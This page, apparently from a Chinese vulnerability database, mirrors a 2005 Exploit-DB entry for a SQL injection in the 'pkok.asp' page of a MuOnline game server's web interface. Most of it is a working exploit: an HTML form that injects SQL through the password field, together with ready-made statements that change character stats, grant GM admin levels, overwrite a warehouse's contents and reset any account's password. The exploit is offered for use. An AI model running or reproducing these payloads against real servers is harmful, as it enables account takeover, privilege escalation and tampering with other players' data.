MuOnline Loopholes Web Server – ‘pkok.asp’ SQL Injection

MuOnline Loopholes Web Server – ‘pkok.asp’ SQL Injection

漏洞ID 1055408 漏洞类型
发布时间 2005-10-15 更新时间 2005-10-15
图片[1]-MuOnline Loopholes Web Server – ‘pkok.asp’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-MuOnline Loopholes Web Server – ‘pkok.asp’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1252
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<!--
Save this code as .htm and replace [SITE]/[SQLCODE] to your server address

Some SQL Examples:

-Changing character data-
update character set clevel=Level,LevelUpPoint=0,Class=ClassCode,Strength=229,Dexterity=9566,Vitality=25,Energy=25,Money=52369819,Ctlcode=0,Resets=29,PkLevel=0,PkTime=0,Experience=208790999 where name='CharName';--

Classcodes arE:
0: Dark Wizard
1: Soul Master
16: Dark knight
17: Blade knight
32: Elf
33: Muse Elf
48: Magic Gladiator
64: Dark Lord

Ctlcode is admin level code:
0:Normal
1: Blocked
8: GM
16: GM LVL2

-Blasting Vault-
update warehouse set items=0xITEMCODE,money=Money where accountid='Accoutname';--

ITEMCODE is which u can get from itemproject.exe u can find it on google ;)

-Changing Account Password-
update MEMB_INFO set memb__pwd='PASSWORD' where memb___id='ACCOUNT';--
Enjoy
-->

<html>
<form action="http://[SITE]/pkok.asp" method="post">
<input type="hidden" name="username" value="notimportant">
<input type="hidden" name="userchr" value="letzinject">
<input name="pass" type="text" value="notimportant';[SQLCODE]">
<input type="submit" name="submit" value="Do IT!">
</form>
</html>

# milw0rm.com [2005-10-15]

相关推荐: WeOnlyDo! wodFtpDLX ActiveX Component Remote Buffer Overflow Vulnerability

WeOnlyDo! wodFtpDLX ActiveX Component Remote Buffer Overflow Vulnerability 漏洞ID 1097598 漏洞类型 Boundary Condition Error 发布时间 2004-11…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享